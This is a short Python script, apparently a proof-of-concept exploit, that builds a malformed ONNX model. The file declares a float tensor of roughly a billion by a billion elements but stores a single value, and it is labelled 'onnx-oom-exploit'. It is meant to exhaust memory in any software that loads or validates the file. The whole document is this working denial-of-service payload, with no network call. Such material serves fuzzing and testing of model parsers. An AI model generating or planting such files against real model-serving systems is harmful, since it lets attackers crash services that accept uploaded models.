| import onnx |
| from onnx import helper, TensorProto |
| import struct |
|
|
| def create_oom_onnx(output_path): |
| print("[*] Creating ONNX model with huge initializer dimensions...") |
| |
| |
| |
| |
| |
| raw_data = struct.pack("<f", 1.0) |
| |
| |
| huge_dims = [1024*1024*1024, 1024*1024*1024] |
| |
| initializer = helper.make_tensor( |
| name="huge_tensor", |
| data_type=TensorProto.FLOAT, |
| dims=huge_dims, |
| vals=[1.0], |
| raw=False |
| ) |
| |
| node_def = helper.make_node("Identity", ["huge_tensor"], ["output"]) |
| graph_def = helper.make_graph( |
| [node_def], "oom-graph", |
| [], |
| [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])], |
| initializer=[initializer] |
| ) |
| |
| model_def = helper.make_model(graph_def, producer_name="onnx-oom-exploit", opset_imports=[onnx.helper.make_opsetid("ai.onnx", 19)]) |
| onnx.save(model_def, output_path) |
| print(f"[+] Model saved to {output_path}") |
|
|
| if __name__ == "__main__": |
| create_oom_onnx("/tmp/oom.onnx") |
|
|